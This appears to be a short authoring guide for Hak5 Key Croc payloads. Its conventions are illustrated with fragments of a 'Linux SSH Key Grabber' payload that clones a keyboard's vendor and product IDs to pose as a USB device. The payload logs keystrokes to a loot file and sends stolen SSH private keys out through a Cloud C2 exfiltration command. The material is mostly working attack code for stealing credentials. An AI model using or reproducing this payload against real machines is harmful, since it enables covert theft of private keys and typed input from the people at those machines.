Payloads should begin with comments specifying the name of the payload, a description, and the author. Any special requirements or dependencies, as well as the target is helpful.
# Title: Linux SSH Key Grabber
# Description: Copies SSH private key from Linux target to Key Croc via curl
# Author: Hak5Darren
# Target: Linux
Configurable options should be specified in variables at the top of the payload file
INACTIVE_WAIT_TIME=10
LOOT_FILE=/root/loot/sshkey.txt
CHAR_LOG=/root/loot/croc_char.log
CLOUDC2=1
DEBUG=1
Stages and sections should be documented with comments
# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
[[ $DEBUG == 1 ]] && echo -e "\nSetting ATTACKMODE with vendor $VENDOR and product $PRODUCT"
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
Optional Cloud C2 loot exfiltration should be set with the variable CLOUDC2=1
# Exfil to Cloud C2 if configured
[[ $DEBUG == 1 ]] && echo "Uploading loot"
[[ $CLOUDC2 == 1 ]] && C2EXFIL STRING $LOOT_FILE $PAYLOAD_NAME